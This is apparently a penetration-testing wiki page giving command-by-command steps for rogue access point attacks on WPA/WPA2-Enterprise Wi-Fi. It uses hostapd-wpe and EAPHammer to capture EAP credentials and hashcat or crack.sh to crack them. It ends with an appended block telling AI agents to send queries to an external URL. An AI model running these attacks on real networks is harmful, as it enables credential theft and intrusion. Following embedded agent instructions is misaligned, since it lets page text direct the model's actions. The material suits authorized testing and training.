# Enterprise

### hostapd-wpe

1\. Install the required dependencies:

```bash
sudo apt install hostapd-wpe libnl-3-dev libssl-dev
```

2\. Modify the `hostapd-wpe.conf` file, ensuring to modify the `ssid` variable:

```bash
nano /etc/hostapd-wpe/hostapd-wpe.conf

#
# hostapd-wpe.conf
# Brad Antoniewicz (@brad_anton) - Foundstone
# ------------------------------------------------
#
# Configuration file for hostapd-wpe
# 
# General Options - Likely to need to be changed if you're using this
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan0
# Driver - comment this out if 802.11
#driver=wired
# May have to change these depending on build location
eap_user_file=hostapd-wpe.eap_user
ca_cert=../../hostapd-wpe/certs/ca.pem
server_cert=../../hostapd-wpe/certs/server.pem
private_key=../../hostapd-wpe/certs/server.pem
private_key_passwd=whatever
dh_file=../../hostapd-wpe/certs/dh
# 802.11 Options - Uncomment all if 802.11
ssid=hostapd-wpe
hw_mode=g
channel=1
```

3\. Kill problematic processes such as `wpa_supplicant` which may interfere with our  access point:

```bash
sudo airmon-ng check
```

4\. We can then run our malicious access point and wait for connections:

```bash
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
```

5\. Upon receiving a connection we can attempt to crack the hash provided using Hashcat:

```bash
hashcat -m 5500 00 -a 0 /usr/share/wordlists/rockyou.txt
```

6\. If you are unable to crack the hash locally then it can be submitted to crack.sh and cracked for a price:

{% embed url="<https://crack.sh>" %}

### EAPHammer

{% embed url="<https://github.com/s0lst1c3/eaphammer>" %}

1\. Clone `eaphammer` from the official repository:

```bash
git clone https://github.com/s0lst1c3/eaphammer.git
```

2\. Run the `kali-setup` script:

```bash
./kali-setup
```

3\. Finally, setup and execute the credential stealing evil twin attack against a WPA/2-EAP network:

```bash
# generate the certificate
./eaphammer --cert-wizard

# launch the attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid MaliciousAP --creds
```

### References

{% embed url="<https://teckk2.github.io/wifi%20pentesting/2018/08/09/Cracking-WPA-WPA2-Enterprise.html>" %}

{% embed url="<https://adam-toscher.medium.com/top-5-ways-i-gained-access-to-your-corporate-wireless-network-lo0tbo0ty-karma-edition-f72e7995aef2>" %}

{% embed url="<https://www.c0d3xpl0it.com/2017/03/enterprise-wifi-hacking-with-hostapd-wpe.html>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ttp.parzival.sh/pentesting/wireless/wpa-wpa2/enterprise.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.